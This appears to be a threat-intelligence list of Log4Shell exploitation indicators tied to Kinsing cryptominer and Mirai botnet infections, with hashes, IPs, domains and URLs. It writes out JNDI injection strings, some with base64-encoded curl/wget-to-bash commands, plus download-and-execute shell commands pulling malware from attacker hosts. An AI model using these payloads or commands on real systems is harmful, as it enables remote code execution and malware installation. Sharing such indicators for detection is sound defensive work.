Hashes
SHA1
1d1866b00f948c103a9076b39061bde5c1f68350 - Backdoor.Linux.MIRAI.SEMR

8dcfce4dcfbead344c15dfc4b3a4395dd0f9750f - Trojan.SH.KINSING.H
284a97cab405a28732035186a0c6306a692d4480 - Trojan.SH.KINSING.I
0194637f1e83c2efc8bcda8d20c446805698c7bc - Coinminer.Linux.KINSING.D

-----------------------------------------------------------------------

HTTP Headers
$%7Bjndi%3Aldaps%3A//0384eb5a.probe001.log4j[.]leakix.net%3A1266/b%7D

$%7Bjndi:ldaps://029e7c6c.probe001.log4j[.]leakix.net:1266/b%7D

${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}

${jndi:ldap://015ed9119662[.]bingsearchlib[.]com:39356/a}

${jndi:ldap://32fce0c1f193[.]bingsearchlib[.]com:39356/a}

${jndi:ldap://3be6466b6a20[.]bingsearchlib[.]com:39356/a}

${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDQuMjA5LjE3Ni4yNDM6ODA4MHx8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC8yMDQuMjA5LjE3Ni4yNDM6ODA4MCl8YmFzaA==}

${jndi:ldap://45.155.205[.]233[:]12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC9bdmljdGltIElQXTpbdmljdGltIHBvcnRdfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0L1t2aWN0aW0gSVBdOlt2aWN0aW0gcG9ydF0pfGJhc2gK}

${jndi:ldap://4568-3409-8076-3389.service[.]exfil.site}

${jndi:ldap://6c8d7dd40593[.]bingsearchlib[.]com:39356/a}

${jndi:ldap://7faf976567f5[.]bingsearchlib[.]com:39356/a}

${jndi:ldap://80.71.158[.]12:5557/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=}

${jndi:ldap://e86eafcf9294[.]bingsearchlib[.]com:39356/a}

${jndi:ldap:/jjug8i.xaliyun[.]com/x}

?&token=${jndi:rmi://vyvdsvh.x.i.yunzhanghu[.]co:443/abc}

500.html?aspxerrorpath=/${jndi:ldap:/45[.]130.229.168:1389/Exploit}

login?next=${jndi:dns://lnc7vvhztmjdfm221sdp76xnze5atz.burpcollaborator[.]net:443}

----------------------------------------------------------------------------------

IP Addresses

104.244.79[.]6
109.237.96[.]124
171.25.193[.]20
171.25.193[.]25
171.25.193[.]77
171.25.193[.]78
178.17.171[.]102
18.27.197[.]252
185.100.87[.]202
185.220.100[.]242
185.220.101[.]146
185.220.101[.]39
213.164.204[.]146
45.155.205[.]233
89.234.182[.]139

--------------------------------------------------------

Kinsing Mining Activity

Commands

curl -o /tmp/kinsing http://80.71.158.12/kinsing
curl -o /tmp/libsystem.so http://80.71.158.12/libsystem.so
curl -o /etc/kinsing http://80.71.158.12/kinsing
chmod 777 /tmp/kinsing
chattr -R -i /var/spool/cron
chmod +x /etc/kinsing

URLs

http[:]//45.137.155[.]55/ex[.]sh
http[:]//45.137.155[.]55/kinsing
http[:]//80.71.158[.]12/libsystem.so
http[:]//80.71.158[.]12/kinsing
http[:]//80.71.158[.]12/Exploit69ogQNSQYz.class

Hashes 
SHA256
6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b
8933820cf2769f6e7f1a711e188f551c3d5d3843c52167a34ab8d6eabb0a63ef
C38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a

Hashes
SHA1
1d1866b00f948c103a9076b39061bde5c1f68350
8dcfce4dcfbead344c15dfc4b3a4395dd0f9750f
284a97cab405a28732035186a0c6306a692d4480
0194637f1e83c2efc8bcda8d20c446805698c7bc
e851126ef41e3dc474238d3160f4b0e7e3bbb7ec

--------------------------------------------------------------------------------

Mirai Infection Activity

Mirai retrieval script (SHA256)

3f6120ca0ff7cf6389ce392d4018a5e40b131a083b071187bf54c900e2edad26 (lh[.]sh)

Binary retrieval/execution commands

wget hxxp[:]//62.210.130[.]250/web/admin/x86;chmod +x x86;./x86 x86;
wget hxxp[:]//62.210.130[.]250/web/admin/x86_64;chmod +x x86_64;./x86_g x86_64;
wget hxxp[:]//62.210.130[.]250/web/admin/x86_g;chmod +x x86_g;./x86_g x86_g;

Mirai binary hashes (SHA256)

2b794cc70cb33c9b3ae7384157ecb78b54aaddc72f4f9cf90b4a4ce4e6cf8984
776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00
8052f5cc4dfa9a8b4f67280a746acbc099319b9391e3b495a27d08fb5f08db81

Mirai attacker IP address

62.210.130[.]250

------------------------------------------------------------------------------

Additional Malware Payload Hashes
SHA256
0e574fd30e806fe4298b3cbccb8d1089454f42f52892f87554325cb352646049
19370ef36f43904a57a667839727c09c50d5e94df43b9cfb3183ba766c4eae3d
2a4e636c4077b493868ea696db3be864126d1066cdc95131f522a4c9f5fb3fec
2b794cc70cb33c9b3ae7384157ecb78b54aaddc72f4f9cf90b4a4ce4e6cf8984
39db1c54c3cc6ae73a09dd0a9e727873c84217e8f3f00e357785fba710f98129
5c46098887e488d91f42c6d9b93b17b2736c9f4cb5a4a1e476c87c0d310a3f28
6370939d4ff51b934b7a2674ee7307ed06111ab3b896a8847d16107558f58e5b
63d43e5b292b806e857470e53412310ad7103432ba3390ecd4f74e432530a8a9
6a8965a0f897539cc06fefe65d1a4c5fa450d002d1a9d5d69d2b48f697ee5c05
715f1f821d028e165bfa750d73505f1a6136184999411300cc88c18ebfa6e8f7
776c341504769aa67af7efc5acc66c338dab5684a8579134d3f23165c7abcc00
8052f5cc4dfa9a8b4f67280a746acbc099319b9391e3b495a27d08fb5f08db81
a3f72a73e146834b43dab8833e0a9cfee6d08843a4c23fdf425295e53517afce
b3a6fe5bc3883fd26c682bb6271a700b8a6fe006ad8df6c09cc87530fcd3a778
b55ddbaee7abf1c73570d6543dd108df0580b08f730de299579570c23b3078c0
c154d739cab62e958944bb4ac5ebad6e965a0442a3f1c1d99d56137e3efa8e40
c38f0f809a1d8c50aafc2f13185df1441345f83f6eb4ef9c48270b9bd90c6799
e20806791aeae93ec120e728f892a8850f624ce2052205ddb3f104bbbfae7f80
fe98548300025a46de1e06b94252af601a215b985dad31353596af3c1813efb0

-------------------------------------------------------------------------------

Observed Domains

abrahackbugs[.]xyz
cuminside[.]club
m3[.]wtf
pwn[.]af
rce[.]ee
x41[.]me